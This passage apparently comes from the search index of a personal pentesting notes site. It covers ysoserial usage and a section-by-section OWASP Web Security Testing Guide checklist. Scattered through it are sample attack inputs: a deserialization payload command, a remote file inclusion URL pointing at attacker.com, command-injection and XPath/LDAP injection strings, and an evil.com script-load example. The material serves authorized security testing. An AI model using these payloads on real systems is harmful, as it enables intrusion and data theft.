                            ","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#basic-usage","title":"Basic usage","text":"
                            java -jar ysoserial-all.jar [payload] \"[command]\"\n
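
                            For instance (a hedged illustration; the gadget chain must match a vulnerable library actually present on the target), generating a CommonsCollections payload and base64-encoding it for transport:

                            java -jar ysoserial-all.jar CommonsCollections5 'touch /tmp/pwned' | base64 -w 0 > payload.b64\n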

                            See lab: Burpsuite Lab

                            In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. For example:

java -jar ysoserial-all.jar \\\n  --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\\n  --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\\n  --add-opens=java.base/java.net=ALL-UNNAMED \\\n  --add-opens=java.base/java.util=ALL-UNNAMED \\\n  [payload] '[command]'\n
                            ","tags":["webpentesting","tools","deserialization","java"]},{"location":"OWASP/","title":"OWASP Web Security Testing Guide","text":"Phase Name of phase Objectives 1 Pre\u2013Engagement Define the scope and objectives of the penetration test, including the target web application, URLs, and functionalities to be tested. Obtain proper authorization and permission from the application owner to conduct the test. Gather relevant information about the application, such as technologies used, user roles, and business-critical functionalities. 2 Information Gathering & Reconnaissance Perform passive reconnaissance to gather publicly available information about the application and its infrastructure. Enumerate subdomains, directories, and files to discover hidden or sensitive content. Use tools like \"Nmap\" to identify open ports and services running on the web server. Utilize \"Google Dorks\" to find indexed information, files, and directories on the target website. 3 Threat Modeling Analyze the application's architecture and data flow to identify potential threats and attack vectors. Build an attack surface model to understand how attackers can interact with the application. Identify potential high-risk areas and prioritize testing efforts accordingly. 4 Vulnerability Scanning Use automated web vulnerability scanners like \"Burp Suite\" or \"OWASP ZAP\" to identify common security flaws. Verify and validate the scan results manually to eliminate false positives and false negatives. 5 Manual Testing & Exploitation Perform manual testing to validate and exploit identified vulnerabilities in the application. Test for input validation issues, authentication bypass, authorization flaws, and business logic vulnerabilities. Attempt to exploit security flaws to demonstrate their impact and potential risk to the application. 6 Authentication & Authorization Testing Test the application's authentication mechanisms to identify weaknesses in password policies, session management, and account lockout procedures. Evaluate the application's access controls to ensure that unauthorized users cannot access sensitive functionalities or data. 7 Session Management Testing Evaluate the application's session management mechanisms to prevent session fixation, session hijacking, and session-related attacks. Check for session timeout settings and proper session token handling. 8 Information Disclosure Review how the application handles sensitive information such as passwords, user data, and confidential files. Test for information disclosure through error messages, server responses, or improper access controls. 9 Business Logic Testing Analyze the application's business logic to identify flaws that could lead to unauthorized access or data manipulation. Test for order-related vulnerabilities, privilege escalation, and other business logic flaws. 10 Client-Side Testing Evaluate the client-side code (HTML, JavaScript) for potential security vulnerabilities, such as DOM-based XSS. Test for insecure client-side storage and sensitive data exposure. 11 Reporting & Remediation Document and prioritize the identified security vulnerabilities and risks. Provide a detailed report to developers and stakeholders, including recommendations for remediation. Assist developers in fixing the identified security issues and retesting the application to ensure that the fixes were successful. 12 Post-Engagement Conduct a post-engagement meeting to discuss the test results with stakeholders. 
Provide security awareness training to the development team to promote secure coding practices.

Other methodologies: PTES (http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines) is a complete penetration testing methodology that covers all aspects of security assessments, including web application testing. It provides a structured approach from pre-engagement through reporting and follow-up, making it suitable for comprehensive assessments.

                            ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#1-information-gathering","title":"1. Information Gathering","text":"1. Information Gathering ID Link to Hackinglife Link to OWASP Description 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, \\ tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage.- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#2-configuration-and-deploy-management-testing","title":"2. Configuration and Deploy Management Testing","text":"2. Configuration and Deploy Management Testing ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials. 2.2 WSTG-CONF-02.md Test Application Platform Configuration - Ensure that defaults and known files have been removed. 
                             - Review configuration and server handling (40x, 50x) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage, Log Rotation, Log Access Control, Log Review 2.3 WSTG-CONF-03 Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important files and information (.asa, .inc, .sql, .zip, .tar, .pdf, .txt, etc.) - Validate that no system framework bypasses exist on the rules set. 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080) 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques. 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ | 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from. 2.9 WSTG-CONF-09 Test File Permission - Review and identify any rogue file permissions. - Identify configuration files whose permissions are set to world-readable from the installation by default. 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains. 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place. 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations. 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#3-identity-management-testing","title":"3. Identity Management Testing","text":"3. Identity Management Testing ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given. 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process. 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type. 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis. 
                             3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#4-authentication-testing","title":"4. Authentication Testing","text":"4. Authentication Testing ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords. 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking. 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and does not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocomplete=off? 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: no-cache) 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords. 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straightforward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities. 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email?) - Test password change (Need old password?) 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exist on the alternative channels. 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#5-authorization-testing","title":"5. Authorization Testing","text":"5. 
                             Authorization Testing ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser) 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures. 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456) 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#6-session-management-testing","title":"6. Session Management Testing","text":"6. Session Management Testing ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated. 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict) 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renews the cookie after a successful user authentication. 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method?) 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token. 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout. 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable. 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level. 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. 
                             - Determine whether the JWTs can be tampered with or modified.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#7-data-validation-testing","title":"7. Data Validation Testing","text":"7. Data Validation Testing ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP. 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user=* user=*)(uid=*))(|(uid=* pass=password - Assess the severity of the injection: 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \", <>, &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities. 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presence of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection. 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: ' or '1' = '1 Password: ' or '1' = '1 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, ', \", @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts. 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity. 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:| 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application. 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible. 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable. 
                             7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes to the end user's browser proxy or client-side application. 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header. 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Assess the severity of the vulnerability. 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#8-error-handling","title":"8. Error Handling","text":"8. Error Handling ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: random files/folders (40x)). - Analyze the different output returned. 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#9-cryptography","title":"9. Cryptography","text":"9. Cryptography ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (identify weak ciphers/protocols, i.e. RC4, BEAST, CRIME, POODLE). - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application. 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis. 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customer data) 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification of weak encryption or hashing uses and implementations.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#10-business-logic-testing","title":"10. Business logic Testing","text":"10. Business logic Testing ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it. 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow. 
                             10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow. 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing (Race Condition). 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times. 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified. 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcome file types are rejected and handled safely. Also, check whether the website only checks for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed. 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#11-client-side-testing","title":"11. 
Client Side Testing","text":"11. Client Side Testing ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points. 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user= 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection. 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless. 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable. 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels. 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input. 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries. 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques. 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#12-api-testing","title":"12. API Testing","text":"12. API Testing ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/WSTG-APIT-01/","title":"Testing GraphQL","text":"

                            OWASP Web Security Testing Guide 4.2 > 12. API Testing > 12.1. Testing GraphQL

                            ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["web pentesting","WSTG-APIT-01"]},{"location":"OWASP/WSTG-ATHN-01/","title":"Testing for Credentials Transported over an Encrypted Channel","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.1. Testing for Credentials Transported over an Encrypted Channel

                            ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03","tags":["web pentesting","WSTG-ATHN-01"]},{"location":"OWASP/WSTG-ATHN-02/","title":"Testing for Default Credentials","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.2. Testing for Default Credentials

                            ID Link to Hackinglife Link to OWASP Description 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords.","tags":["web pentesting","WSTG-ATHN-02"]},{"location":"OWASP/WSTG-ATHN-03/","title":"Testing for Weak Lock Out Mechanism","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.3. Testing for Weak Lock Out Mechanism

                            ID Link to Hackinglife Link to OWASP Description 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking.","tags":["web pentesting","WSTG-ATHN-03"]},{"location":"OWASP/WSTG-ATHN-04/","title":"Testing for Bypassing Authentication Schema","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.4. Testing for Bypassing Authentication Schema

                            ID Link to Hackinglife Link to OWASP Description 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection","tags":["web pentesting","WSTG-ATHN-04"]},{"location":"OWASP/WSTG-ATHN-05/","title":"Testing for Vulnerable Remember Password","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.5. Testing for Vulnerable Remember Password

                             ID Link to Hackinglife Link to OWASP Description 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and does not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocomplete=off?","tags":["web pentesting","WSTG-ATHN-05"]},{"location":"OWASP/WSTG-ATHN-06/","title":"Testing for Browser Cache Weaknesses","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.6. Testing for Browser Cache Weaknesses

                             ID Link to Hackinglife Link to OWASP Description 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: no-cache)","tags":["web pentesting","WSTG-ATHN-06"]},{"location":"OWASP/WSTG-ATHN-07/","title":"Testing for Weak Password Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.7. Testing for Weak Password Policy

                             ID Link to Hackinglife Link to OWASP Description 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords.","tags":["web pentesting","WSTG-ATHN-07"]},{"location":"OWASP/WSTG-ATHN-08/","title":"Testing for Weak Security Question Answer","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.8. Testing for Weak Security Question Answer

                             ID Link to Hackinglife Link to OWASP Description 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straightforward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities.","tags":["web pentesting","WSTG-ATHN-08"]},{"location":"OWASP/WSTG-ATHN-09/","title":"Testing for Weak Password Change or Reset Functionalities","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.9. Testing for Weak Password Change or Reset Functionalities

                             ID Link to Hackinglife Link to OWASP Description 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email?) - Test password change (Need old password?)","tags":["web pentesting","WSTG-ATHN-09"]},{"location":"OWASP/WSTG-ATHN-10/","title":"Testing for Weaker Authentication in Alternative Channel","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.10. Testing for Weaker Authentication in Alternative Channel

                             ID Link to Hackinglife Link to OWASP Description 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exist on the alternative channels.","tags":["web pentesting","WSTG-ATHN-10"]},{"location":"OWASP/WSTG-ATHN-11/","title":"Testing Multi-Factor Authentication (MFA)","text":"

                            OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.11. Testing Multi-Factor Authentication (MFA)

                            ID Link to Hackinglife Link to OWASP Description 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["web pentesting","WSTG-ATHN-11"]},{"location":"OWASP/WSTG-ATHZ-01/","title":"Testing Directory Traversal File Include","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                            ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-01/#see-my-notes","title":"See my notes","text":"

